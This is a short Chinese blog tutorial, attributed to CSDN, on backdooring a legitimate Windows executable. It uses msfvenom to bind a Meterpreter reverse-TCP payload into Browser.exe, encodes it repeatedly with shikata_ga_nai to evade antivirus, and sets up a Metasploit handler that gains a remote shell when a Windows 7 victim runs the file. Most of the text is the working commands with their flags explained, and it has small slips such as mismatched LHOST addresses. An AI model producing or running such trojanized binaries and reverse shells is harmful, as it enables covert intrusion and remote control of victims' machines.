- 进入文件夹,我们先要把我们需要制作后门程序的正常exe文件拖进去
- 在此处打开终端,确保该路径存在这个exe文件!
- 输入命令
msfvenom -a x86 --platform widows -p windows/meterpreter/reverse_tcp LHOST=192.168.132.133 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -x Browser.exe -f exe -o /root/project/Browser.exe
-a:用于指定架构
–platform用于指定平台
-p用于指定payload
LHOST处填写自己kali的地址
LPORT指定端口
-b指去除坏字符
-e是指定编码器
-i是加码
-x是指定本目录下我们的无毒原文件
-f指定输出格式
-o指定导出路径以及文件名称 - 在指定路径下就可以看到我们生成的文件
- 然后把该文件扔给window7但先不运行
- 回到kali打开msfconsole设置启用handler模块,设置ip等一系列操作
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.53
set LPORT 4444
exploit
7. 然后再进入window7运行exe文件,当然这里我选用的安装包不怎么合适,因为文件本身被修改了所以运行之后出不来界面,但运行之后仍然是可以捕捉到该机器的ip的
8.在该界面就一个执行一些系统命令了
来源:CSDN
作者:Deeeelete
链接:https://blog.csdn.net/Deeeelete/article/details/104169983